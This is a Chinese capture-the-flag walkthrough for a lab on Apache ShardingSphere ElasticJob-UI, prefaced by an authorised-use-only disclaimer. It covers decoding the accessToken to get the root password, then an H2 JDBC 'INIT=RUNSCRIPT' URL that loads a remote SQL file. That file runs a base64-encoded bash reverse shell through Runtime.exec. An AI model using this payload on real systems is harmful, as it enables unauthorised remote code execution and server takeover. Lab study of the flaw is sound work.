声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!
靶场介绍
Apache ShardingSphere ElasticJob-UI由于返回 token 中包含了管理员密码,攻击者可利用该漏洞在授权的情况下,构造恶意数据执行权限绕过攻击,最终获取服务器最高权限。
春秋云镜开启靶场:
http://eci-2ze9ffy8hwa5yf6xqakw.cloudeci1.ichunqiu.com:8088/#/
账号guest 密码guest 抓包会返回accessToken 解密accessToken 即可拿到root密码
账号root 密码root登录
先开启一个web服务
网站目录下放poc.sql文件
|
我们目的是反弹shell
nc监听---命令编码
最终payload:
CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "123";}';CALL EXEC ('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}')
保存为poc.sql文件放在启用的网站下
Event trace data source---ADD
127.0.0.1:8888是我们启用的web服务
url处
jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://127.0.0.1:8888/poc.sql'
Confirm一下 即可反弹shell到vps
靶场访问了我们启用的网站 并且执行了里面的poc.sql的恶意代码
cat ../../../../../../flag
成功获取flag